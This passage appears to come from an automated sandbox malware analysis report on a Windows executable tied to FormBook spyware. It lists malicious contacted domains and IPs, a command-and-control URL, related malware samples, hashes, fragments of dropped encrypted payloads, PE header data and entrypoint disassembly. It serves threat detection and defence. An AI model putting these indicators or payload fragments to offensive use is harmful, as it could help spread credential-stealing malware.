http://www.8686206.xyz/Chat/117d999873.html	newdev.exe, 00000008.00000002.4051240751.000000000582C000.00000004.10000000.00040000.00000000.sdmp, newdev.exe, 00000008.00000002.4053567818.0000000007720000.00000004.00000800.00020000.00000000.sdmp, CsyVZPSRWzlUG.exe, 00000009.00000002.4050870275.00000000033AC000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.litespeedtech.com/error-page	newdev.exe, 00000008.00000002.4051240751.00000000051E4000.00000004.10000000.00040000.00000000.sdmp, CsyVZPSRWzlUG.exe, 00000009.00000002.4050870275.0000000002D64000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.3270029445.00000000014B4000.00000004.80000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.8686206.xyz/Chat/52b999938.html	newdev.exe, 00000008.00000002.4051240751.000000000582C000.00000004.10000000.00040000.00000000.sdmp, newdev.exe, 00000008.00000002.4053567818.0000000007720000.00000004.00000800.00020000.00000000.sdmp, CsyVZPSRWzlUG.exe, 00000009.00000002.4050870275.00000000033AC000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.8686206.xyz/Chat/9c599985.html	newdev.exe, 00000008.00000002.4051240751.000000000582C000.00000004.10000000.00040000.00000000.sdmp, newdev.exe, 00000008.00000002.4053567818.0000000007720000.00000004.00000800.00020000.00000000.sdmp, CsyVZPSRWzlUG.exe, 00000009.00000002.4050870275.00000000033AC000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ziyuan.baidu.com/image.gif	newdev.exe, 00000008.00000002.4051240751.000000000582C000.00000004.10000000.00040000.00000000.sdmp, newdev.exe, 00000008.00000002.4053567818.0000000007720000.00000004.00000800.00020000.00000000.sdmp, CsyVZPSRWzlUG.exe, 00000009.00000002.4050870275.00000000033AC000.00000004.00000001.00040000.00000000.sdmp	false		high
http://www.8686206.xyz/Chat/316e999674.html	newdev.exe, 00000008.00000002.4051240751.000000000582C000.00000004.10000000.00040000.00000000.sdmp, newdev.exe, 00000008.00000002.4053567818.0000000007720000.00000004.00000800.00020000.00000000.sdmp, CsyVZPSRWzlUG.exe, 00000009.00000002.4050870275.00000000033AC000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.8686206.xyz/Chat/271b999719.html	newdev.exe, 00000008.00000002.4051240751.000000000582C000.00000004.10000000.00040000.00000000.sdmp, newdev.exe, 00000008.00000002.4053567818.0000000007720000.00000004.00000800.00020000.00000000.sdmp, CsyVZPSRWzlUG.exe, 00000009.00000002.4050870275.00000000033AC000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.8686206.xyz/Chat/188e999802.html	newdev.exe, 00000008.00000002.4051240751.000000000582C000.00000004.10000000.00040000.00000000.sdmp, newdev.exe, 00000008.00000002.4053567818.0000000007720000.00000004.00000800.00020000.00000000.sdmp, CsyVZPSRWzlUG.exe, 00000009.00000002.4050870275.00000000033AC000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.8686206.xyz/shuiyechaoyangh/	newdev.exe, 00000008.00000002.4051240751.000000000582C000.00000004.10000000.00040000.00000000.sdmp, newdev.exe, 00000008.00000002.4053567818.0000000007720000.00000004.00000800.00020000.00000000.sdmp, CsyVZPSRWzlUG.exe, 00000009.00000002.4050870275.00000000033AC000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.8686206.xyz/template/news/newsblue/css/common.css	newdev.exe, 00000008.00000002.4051240751.000000000582C000.00000004.10000000.00040000.00000000.sdmp, newdev.exe, 00000008.00000002.4053567818.0000000007720000.00000004.00000800.00020000.00000000.sdmp, CsyVZPSRWzlUG.exe, 00000009.00000002.4050870275.00000000033AC000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ac.ecosia.org/autocomplete?q=	newdev.exe, 00000008.00000002.4053807355.0000000007A08000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.8686206.xyz/aiyinmaliya/	newdev.exe, 00000008.00000002.4051240751.000000000582C000.00000004.10000000.00040000.00000000.sdmp, newdev.exe, 00000008.00000002.4053567818.0000000007720000.00000004.00000800.00020000.00000000.sdmp, CsyVZPSRWzlUG.exe, 00000009.00000002.4050870275.00000000033AC000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.8686206.xyz/Chat/057b999933.html	newdev.exe, 00000008.00000002.4051240751.000000000582C000.00000004.10000000.00040000.00000000.sdmp, newdev.exe, 00000008.00000002.4053567818.0000000007720000.00000004.00000800.00020000.00000000.sdmp, CsyVZPSRWzlUG.exe, 00000009.00000002.4050870275.00000000033AC000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.8686206.xyz/shuiximeili/	newdev.exe, 00000008.00000002.4051240751.000000000582C000.00000004.10000000.00040000.00000000.sdmp, newdev.exe, 00000008.00000002.4053567818.0000000007720000.00000004.00000800.00020000.00000000.sdmp, CsyVZPSRWzlUG.exe, 00000009.00000002.4050870275.00000000033AC000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.8686206.xyz/Chat/294a499701.html	newdev.exe, 00000008.00000002.4051240751.000000000582C000.00000004.10000000.00040000.00000000.sdmp, newdev.exe, 00000008.00000002.4053567818.0000000007720000.00000004.00000800.00020000.00000000.sdmp, CsyVZPSRWzlUG.exe, 00000009.00000002.4050870275.00000000033AC000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.8686206.xyz/xiqijiexika/	newdev.exe, 00000008.00000002.4051240751.000000000582C000.00000004.10000000.00040000.00000000.sdmp, newdev.exe, 00000008.00000002.4053567818.0000000007720000.00000004.00000800.00020000.00000000.sdmp, CsyVZPSRWzlUG.exe, 00000009.00000002.4050870275.00000000033AC000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.8686206.xyz/Chat/516f699477.html	newdev.exe, 00000008.00000002.4051240751.000000000582C000.00000004.10000000.00040000.00000000.sdmp, newdev.exe, 00000008.00000002.4053567818.0000000007720000.00000004.00000800.00020000.00000000.sdmp, CsyVZPSRWzlUG.exe, 00000009.00000002.4050870275.00000000033AC000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.8686206.xyz/Chat/492a699501.html	newdev.exe, 00000008.00000002.4051240751.000000000582C000.00000004.10000000.00040000.00000000.sdmp, newdev.exe, 00000008.00000002.4053567818.0000000007720000.00000004.00000800.00020000.00000000.sdmp, CsyVZPSRWzlUG.exe, 00000009.00000002.4050870275.00000000033AC000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
69.57.163.64	www.expertguide.info	United States	25653	FORTRESSITXUS	true
64.46.102.238	dadu89.org	United States	26163	DATAGRAMUS	true
13.248.169.48	www.shipley.group	United States	16509	AMAZON-02US	true
173.208.249.155	banajibazar.xyz	United States	32097	WIIUS	true
104.21.32.1	www.topkapiescortg.xyz	United States	13335	CLOUDFLARENETUS	true
103.249.106.91	www.8686206.xyz	China	137443	ANCHGLOBAL-AS-APAnchnetAsiaLimitedHK	true

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1588320
Start date and time:	2025-01-11 00:04:41 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 9m 8s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Run name:	Run with higher sleep bypass
Number of analysed new started processes analysed:	9
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	2
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	25IvlOVEB1.exe renamed because original name is a hash value
Original Sample Name:	09fa5543a2a9ea0c677e5a79f84728f7af4c08dc519808117a6ef99021636307.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@7/5@7/6
EGA Information:	Successful, ratio: 66.7%
HCA Information:	Successful, ratio: 87% Number of executed functions: 59 Number of non-executed functions: 270
Cookbook Comments:	Found application associated with file extension: .exe Sleeps bigger than 100000000ms are automatically reduced to 1000ms Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
Excluded IPs from analysis (whitelisted): 13.107.246.45, 20.109.210.53, 20.12.23.50
Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing disassembly code.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
69.57.163.64	AuKUol8SPU.exe	Get hash	malicious	FormBook	Browse	www.startsomething.xyz/9er8/
	ofZiNLLKZU.exe	Get hash	malicious	FormBook	Browse	www.showyourstyle.top/zbqa/
	3HnH4uJtE7.exe	Get hash	malicious	FormBook	Browse	www.startsomething.xyz/9er8/
	DHL.exe	Get hash	malicious	FormBook	Browse	www.startsomething.xyz/9er8/
	Salmebogs(1).exe	Get hash	malicious	FormBook, GuLoader	Browse	www.openhorizons.pro/ir2n/
13.248.169.48	gH3LlhcRzg.exe	Get hash	malicious	FormBook	Browse	www.autonomousoid.pro/m1if/
	fFoOcuxK7M.exe	Get hash	malicious	FormBook	Browse	www.bcg.services/5onp/
	aBEh0fsi2c.exe	Get hash	malicious	FormBook	Browse	www.fortevision.xyz/dash/
	EIvidclKOb.exe	Get hash	malicious	FormBook	Browse	www.sfantulandrei.info/wvsm/
	bkTW1FbgHN.exe	Get hash	malicious	FormBook	Browse	www.108.foundation/lnu5/
	OVZizpEU7Q.exe	Get hash	malicious	FormBook	Browse	www.tals.xyz/h8xm/
	QmBbqpEHu0.exe	Get hash	malicious	FormBook	Browse	www.hsa.world/09b7/
	cNDddMAF5u.exe	Get hash	malicious	FormBook	Browse	www.bcg.services/5onp/
	3HnH4uJtE7.exe	Get hash	malicious	FormBook	Browse	www.shipley.group/5g1j/
	KcSzB2IpP5.exe	Get hash	malicious	FormBook	Browse	www.londonatnight.coffee/yvuf/?SDC=kadexEirh/+VAO8zLOQBjj7ri78LMX6rnGwiRgKyb2lIFzAlJiRuP0wbsEUUXC8rnmyzmDulN6bnJ3eZuWUqQAzy8gMCuzUMeqhoyPM0gWyFgi2HaQ==&mH=CpePy0P

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
www.topkapiescortg.xyz	HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exe	Get hash	malicious	FormBook	Browse	172.67.134.42
www.topkapiescortg.xyz	Salmebogs(1).exe	Get hash	malicious	FormBook, GuLoader	Browse	104.21.6.17
www.shipley.group	3HnH4uJtE7.exe	Get hash	malicious	FormBook	Browse	13.248.169.48
banajibazar.xyz	SHIPPING DOCUMENTS_PDF.exe	Get hash	malicious	FormBook	Browse	173.208.249.155
www.masterqq.pro	1k24tbb-00241346.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	172.67.213.249
www.masterqq.pro	file.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	172.67.213.249

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
DATAGRAMUS	SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exe	Get hash	malicious	FormBook	Browse	64.46.102.70
	docs_pdf.exe	Get hash	malicious	FormBook	Browse	64.46.102.70
	purchase order_pdf.exe	Get hash	malicious	FormBook	Browse	64.46.102.70
	npbby5YPWP.elf	Get hash	malicious	Unknown	Browse	69.87.250.21
	xd.arm7.elf	Get hash	malicious	Mirai	Browse	69.87.250.14
	NSUOk1mBL2.elf	Get hash	malicious	Mirai	Browse	69.87.250.23
	t0ccXQapDb.elf	Get hash	malicious	Mirai	Browse	69.87.250.23
	HrcPAmTcxk	Get hash	malicious	Mirai	Browse	69.87.250.25
AMAZON-02US	LiuUGJK9vH.exe	Get hash	malicious	FormBook	Browse	18.141.10.107
	5CTbduoXq4.exe	Get hash	malicious	FormBook	Browse	13.228.81.39
	gH3LlhcRzg.exe	Get hash	malicious	FormBook	Browse	13.248.169.48
	UaOJAOMxcU.exe	Get hash	malicious	FormBook	Browse	54.244.188.177
	0Wu31IhwGO.exe	Get hash	malicious	FormBook	Browse	18.139.62.226
	https://www.shinsengumiusa.com/mrloskie	Get hash	malicious	Unknown	Browse	3.120.85.61
	SABXJ1B5c8.exe	Get hash	malicious	MassLogger RAT	Browse	18.141.10.107
	fFoOcuxK7M.exe	Get hash	malicious	FormBook	Browse	13.248.169.48
	NFhRxwbegd.exe	Get hash	malicious	FormBook	Browse	18.139.62.226
	I3LPkQh2an.exe	Get hash	malicious	FormBook	Browse	18.141.10.107
FORTRESSITXUS	AuKUol8SPU.exe	Get hash	malicious	FormBook	Browse	69.57.163.64
	ofZiNLLKZU.exe	Get hash	malicious	FormBook	Browse	69.57.163.64
	3HnH4uJtE7.exe	Get hash	malicious	FormBook	Browse	69.57.163.64
	Benefit_401k_2025_Enrollment.pdf	Get hash	malicious	Unknown	Browse	69.57.162.6
	miori.spc.elf	Get hash	malicious	Unknown	Browse	69.72.254.176
	sh4.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	208.116.70.219
	DHL.exe	Get hash	malicious	FormBook	Browse	69.57.163.64
	la.bot.mipsel.elf	Get hash	malicious	Mirai	Browse	65.98.32.221
	Salmebogs(1).exe	Get hash	malicious	FormBook, GuLoader	Browse	69.57.163.64
	http://dimfa.elcompanies.digitalillustra.com	Get hash	malicious	Unknown	Browse	65.181.111.144
WIIUS	qSD738Weui.exe	Get hash	malicious	Quasar	Browse	69.197.148.207
	https://aiihsr.com/FloridaCU	Get hash	malicious	Unknown	Browse	173.208.207.172
	SHIPPING DOCUMENTS_PDF.exe	Get hash	malicious	FormBook	Browse	173.208.249.155
	arm.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	173.208.191.42
	mpsl.elf	Get hash	malicious	Mirai, Moobot	Browse	69.197.135.107
	loligang.arm7.elf	Get hash	malicious	Mirai	Browse	69.197.241.147
	nabppc.elf	Get hash	malicious	Unknown	Browse	173.208.211.170
	la.bot.mips.elf	Get hash	malicious	Unknown	Browse	173.208.128.129
	la.bot.arm.elf	Get hash	malicious	Unknown	Browse	204.12.226.228
	m68k.elf	Get hash	malicious	Mirai	Browse	173.208.146.198

Process:	C:\Windows\SysWOW64\newdev.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.1239949490932863
Encrypted:	false
SSDEEP:	384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
MD5:	271D5F995996735B01672CF227C81C17
SHA1:	7AEAACD66A59314D1CBF4016038D3A0A956BAF33
SHA-256:	9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
SHA-512:	62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\aut8CBF.tmp

Download File

Process:	C:\Users\user\Desktop\25IvlOVEB1.exe
File Type:	data
Category:	dropped
Size (bytes):	287744
Entropy (8bit):	7.995556199273721
Encrypted:	true
SSDEEP:	6144:eANXuYq1yOCpr/yVDS+7vq/iyOriD7Zq8jcSZk64OAYr:NNXu1yOA/yVDS+LqCru7Py64Ofr
MD5:	4F3A075DC2458351C319E7B2CCEA12FF
SHA1:	697CEBDB338C024629949EA98C351399A3EC12F7
SHA-256:	DBAC8D00DD003176E702B82F99A5746888C646B5C98E6FCD5F5532A50134FFC6
SHA-512:	4ED6EB6FB1E1070FD2D6A3BD261737F132920B0920BF2D4CE861FBF199CC3FFF0E6D74B0EB3DEFD7AB67E3D9B9F45A08BBF73B28B46FAE508AD7E0214C3CD614
Malicious:	false
Preview:	.j.2549IRTRO..RB.P48SC0Yr649IVTROCFRBJP48SC0Y2649IVTROCFRBJP.8SC>F.84.@.u.N..s."9G.#1_>@WY.7:< 7f0'j"AVs^yvyg.$907aNKXfJP48SC0 3?..)1.o/$.o"-......9U....h2(.\..lT_..Y:Z.T^.VTROCFRB..48.B1Y0..bIVTROCFR.JR53RH0Y`249IVTROCFbVJP4(SC0)6649.VTBOCFPBJV48SC0Y2049IVTROC6VBJR48SC0Y06t.IVDROSFRBJ@48CC0Y264)IVTROCFRBJP48SC0Y2649IVTROCFRBJP48SC0Y2649IVTROCFRBJP48SC0Y2649IVTROCFRBJP48SC0Y2649IVTROCFRBJP48SC0Y2649IVTROCFRBJP48SC0Y2649IVTROm27:>P48'.4Y2&49I.PROSFRBJP48SC0Y264.IV4ROCFRBJP48SC0Y2649IVTROCFRBJP48SC0Y2649IVTROCFRBJP48SC0Y2649IVTROCFRBJP48SC0Y2649IVTROCFRBJP48SC0Y2649IVTROCFRBJP48SC0Y2649IVTROCFRBJP48SC0Y2649IVTROCFRBJP48SC0Y2649IVTROCFRBJP48SC0Y2649IVTROCFRBJP48SC0Y2649IVTROCFRBJP48SC0Y2649IVTROCFRBJP48SC0Y2649IVTROCFRBJP48SC0Y2649IVTROCFRBJP48SC0Y2649IVTROCFRBJP48SC0Y2649IVTROCFRBJP48SC0Y2649IVTROCFRBJP48SC0Y2649IVTROCFRBJP48SC0Y2649IVTROCFRBJP48SC0Y2649IVTROCFRBJP48SC0Y2649IVTROCFRBJP48SC0Y2649IVTROCFRBJP48SC0Y2649IVTROCFRBJP48SC0Y2649IVTROCFRBJP48SC0Y2649IVTROCFRBJP48SC0Y2649IVTROC

C:\Users\user\AppData\Local\Temp\aut8D0E.tmp

Download File

Process:	C:\Users\user\Desktop\25IvlOVEB1.exe
File Type:	data
Category:	dropped
Size (bytes):	9756
Entropy (8bit):	7.622314391016896
Encrypted:	false
SSDEEP:	192:EndJIlBJJxJ7TGo79mpKB9bG9DzBV/u2uR199dnF7RaRw1Nw:EnPmJ7VhmoB9bG9vBV/u2U1PdnSoNw
MD5:	F7C1C3B5E3216AEEA59CB7E62F48C74A
SHA1:	E53728F8271DBC32F3112FCE16365A40831ADDFB
SHA-256:	87AF63C05E7FE7116BA2C73089EA34E8A12ADA942DA018F09935BABE15A7AA77
SHA-512:	BFA29C7C208162D474F9909ADE3579AD5526BF78436884A461C3033223A3F2822FA20479DB7E1778155268C316C6A744CBC655014147DC063B657D3C82DEB1B4
Malicious:	false
Preview:	EA06..p..L..Y..p...o3i...f.NfVk%..1..@.I..m8..f.0..c1...3...s5...`...@.K..f.%...r.lY........d...@.o..c..&...Lls....f.Y...b..-vm6.M@......7.l,........X..K ........g6Y......l..].M..p...9\|....r.1..... ..$h.c.....#@...H,....`..m1.H.f.0...<zm6....!:.B...S..n..Y..s8.t.,.0....5....p....9.... ....d....`....1.....0..Y......./Z..-zu6...js8...zn........V)...#...Nf...N.^.:.....8.:..w.......8...}3.#..qd...g.`./....J.v.6.X.{......)....b..g.....`.Y..`...&.......x...u\| ......l`=.%.f....f.9...,sp./..9....`..%.......;$..#..l.0./.m6.M@4.;$..K..4\|.K..g.d....d.Nf.y....x.g.{ ..d..gSi...@}.<..3.....33+..uf..g6PC`..s....f.,..j........Y.......Y.,.r.Y. .f.e...8...@.2....;2.X.b..Lg@...... ....38...[........9e..,vf.....k3........#.0.....3b.Y.6pj.....Bvh.....@R...o9.4@9..NM..;4.X.n.:M.@..........c.P....3)..f.... ......8.a...g...B)..'f......j.b.X.@..u6..Bvl......).;...N@.;7.X...Cv0}.....g <..L..8.....g..@.@....`...f..!..Lf....l....B;8.X...c3.%..:...!...Gg ....,d..Yg..........c.....

C:\Users\user\AppData\Local\Temp\silvexes

Download File

Process:	C:\Users\user\Desktop\25IvlOVEB1.exe
File Type:	data
Category:	dropped
Size (bytes):	287744
Entropy (8bit):	7.995556199273721
Encrypted:	true
SSDEEP:	6144:eANXuYq1yOCpr/yVDS+7vq/iyOriD7Zq8jcSZk64OAYr:NNXu1yOA/yVDS+LqCru7Py64Ofr
MD5:	4F3A075DC2458351C319E7B2CCEA12FF
SHA1:	697CEBDB338C024629949EA98C351399A3EC12F7
SHA-256:	DBAC8D00DD003176E702B82F99A5746888C646B5C98E6FCD5F5532A50134FFC6
SHA-512:	4ED6EB6FB1E1070FD2D6A3BD261737F132920B0920BF2D4CE861FBF199CC3FFF0E6D74B0EB3DEFD7AB67E3D9B9F45A08BBF73B28B46FAE508AD7E0214C3CD614
Malicious:	false
Preview:	.j.2549IRTRO..RB.P48SC0Yr649IVTROCFRBJP48SC0Y2649IVTROCFRBJP.8SC>F.84.@.u.N..s."9G.#1_>@WY.7:< 7f0'j"AVs^yvyg.$907aNKXfJP48SC0 3?..)1.o/$.o"-......9U....h2(.\..lT_..Y:Z.T^.VTROCFRB..48.B1Y0..bIVTROCFR.JR53RH0Y`249IVTROCFbVJP4(SC0)6649.VTBOCFPBJV48SC0Y2049IVTROC6VBJR48SC0Y06t.IVDROSFRBJ@48CC0Y264)IVTROCFRBJP48SC0Y2649IVTROCFRBJP48SC0Y2649IVTROCFRBJP48SC0Y2649IVTROCFRBJP48SC0Y2649IVTROCFRBJP48SC0Y2649IVTROCFRBJP48SC0Y2649IVTROm27:>P48'.4Y2&49I.PROSFRBJP48SC0Y264.IV4ROCFRBJP48SC0Y2649IVTROCFRBJP48SC0Y2649IVTROCFRBJP48SC0Y2649IVTROCFRBJP48SC0Y2649IVTROCFRBJP48SC0Y2649IVTROCFRBJP48SC0Y2649IVTROCFRBJP48SC0Y2649IVTROCFRBJP48SC0Y2649IVTROCFRBJP48SC0Y2649IVTROCFRBJP48SC0Y2649IVTROCFRBJP48SC0Y2649IVTROCFRBJP48SC0Y2649IVTROCFRBJP48SC0Y2649IVTROCFRBJP48SC0Y2649IVTROCFRBJP48SC0Y2649IVTROCFRBJP48SC0Y2649IVTROCFRBJP48SC0Y2649IVTROCFRBJP48SC0Y2649IVTROCFRBJP48SC0Y2649IVTROCFRBJP48SC0Y2649IVTROCFRBJP48SC0Y2649IVTROCFRBJP48SC0Y2649IVTROCFRBJP48SC0Y2649IVTROCFRBJP48SC0Y2649IVTROCFRBJP48SC0Y2649IVTROC

C:\Users\user\AppData\Local\Temp\underbalanced

Download File

Process:	C:\Users\user\Desktop\25IvlOVEB1.exe
File Type:	ASCII text, with very long lines (28696), with no line terminators
Category:	dropped
Size (bytes):	28696
Entropy (8bit):	3.581648865484026
Encrypted:	false
SSDEEP:	384:fYzxrp0QdaIjEmzLXDXGpPdVTeHybG509:fYz7laIjEmnDXGZTTa509
MD5:	3EBAAB37FD269F7E165F251F89B61CF3
SHA1:	BE6D9AE9D63446F5386C9C80635065E5D4075D45
SHA-256:	800D41E84B589E21408033FD31B7EDFDAF1E09D04AAAF7546AC57DAC74DB348C
SHA-512:	AD745452381B8B2AD08FDDFD46EF485F0257EFB910F4188147A9037F4BF7C9CDA39B952FAFCBED47A67C22769772C455EBC83AA7E19A558401F75BDFA00C3593
Malicious:	false
Preview:	625522888881y669cfd92fddd1311116768c97c111111779:5695c:76111111779:5e97cb83111111779:6699c97f111111779:569bc:76111111779:5e9dcb7d111111779:669fc944111111779:56:1c:43111111779:5e:3cb3f111111779:66:5c975111111779:56:7c:7d111111779:5e:9cb7d111111779:66:b44d1779:56:dc:7f111111779:9e55ggggggcb85111111779::657ggggggc975111111779:9659ggggggc:7d111111779:9e5bggggggcb7d111111779::65dggggggc93f111111779:965fggggggc:75111111779:9e61ggggggcb7d111111779::663ggggggc97d111111779:9665gggggg44d:779:9e67ggggggcb86111111779:66e1c984111111779:56e3c:76111111779:5ee5cb83111111779:66e7c944111111779:56e9c:43111111779:5eebcb3f111111779:66edc975111111779:56efc:7d111111779:5ef1cb7d111111779:66f344d1779:56f5c:72111111779:9e79ggggggcb75111111779::67bggggggc987111111779:967dggggggc:72111111779:9e7fggggggcb81111111779::681ggggggc97:111111779:9683ggggggc:44111111779:9e85ggggggcb43111111779::687ggggggc93f111111779:9689ggggggc:75111111779:9e8bggggggcb7d111111779::68dggggggc97d111111779:968fgggggg44d:779:5e91cb841111117

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.149165036150095
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	25IvlOVEB1.exe
File size:	1'170'432 bytes
MD5:	946477da917ede9b7e4b05baaf618d9e
SHA1:	89669539d9283a6be114c09f241b162243ea1030
SHA256:	09fa5543a2a9ea0c677e5a79f84728f7af4c08dc519808117a6ef99021636307
SHA512:	e817b250aee22a72f079bad0b6db2578a6f15b1840f4a862b49844c990424e52f22c26e53167c10c6ff66585b39f74e68c9723b6380fa79bd1dd0615e7eb8614
SSDEEP:	24576:zu6J33O0c+JY5UZ+XC0kGso6FaDSCvbdnTODFWY:du0c++OCvkGs9FaDTblTLY
TLSH:	A345CF2273DEC360CB669173BF29B7016EBF3C614630B95B2F980D7DA950162162D7A3
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r}..r}..r}..4,".p}......s}.../..A}.../#..}.../".G}..{.@.{}..{.P.W}..r}..R.....)."}......s}.../..s}..r}T.s}......s}..Richr}.

File Icon


Icon Hash:	aaf3e3e3938382a0

Static PE Info

General

Entrypoint:	0x427dcd
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x67571FC9 [Mon Dec 9 16:50:17 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	afcdf79be1557326c854b6e20cb900a7

Entrypoint Preview

Instruction
call 00007F495CE1BBFAh
jmp 00007F495CE0E9C4h
int3
int3
int3
int3
int3
int3
int3
int3
int3
push edi
push esi
mov esi, dword ptr [esp+10h]
mov ecx, dword ptr [esp+14h]
mov edi, dword ptr [esp+0Ch]
mov eax, ecx
mov edx, ecx
add eax, esi
cmp edi, esi
jbe 00007F495CE0EB4Ah
cmp edi, eax
jc 00007F495CE0EEAEh
bt dword ptr [004C31FCh], 01h
jnc 00007F495CE0EB49h
rep movsb
jmp 00007F495CE0EE5Ch
cmp ecx, 00000080h
jc 00007F495CE0ED14h
mov eax, edi
xor eax, esi
test eax, 0000000Fh
jne 00007F495CE0EB50h
bt dword ptr [004BE324h], 01h
jc 00007F495CE0F020h
bt dword ptr [004C31FCh], 00000000h
jnc 00007F495CE0ECEDh
test edi, 00000003h
jne 00007F495CE0ECFEh
test esi, 00000003h
jne 00007F495CE0ECDDh
bt edi, 02h
jnc 00007F495CE0EB4Fh
mov eax, dword ptr [esi]
sub ecx, 04h
lea esi, dword ptr [esi+04h]
mov dword ptr [edi], eax
lea edi, dword ptr [edi+04h]
bt edi, 03h
jnc 00007F495CE0EB53h
movq xmm1, qword ptr [esi]
sub ecx, 08h
lea esi, dword ptr [esi+08h]
movq qword ptr [edi], xmm1
lea edi, dword ptr [edi+08h]
test esi, 00000007h
je 00007F495CE0EBA5h
bt esi, 03h
jnc 00007F495CE0EBF8h

Rich Headers

Programming Language:

[ASM] VS2013 build 21005
[ C ] VS2013 build 21005
[C++] VS2013 build 21005
[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729
[ASM] VS2013 UPD4 build 31101
[RES] VS2013 build 21005
[LNK] VS2013 UPD4 build 31101

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xba44c	0x17c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xc7000	0x553c0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x11d000	0x711c	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x92bc0	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
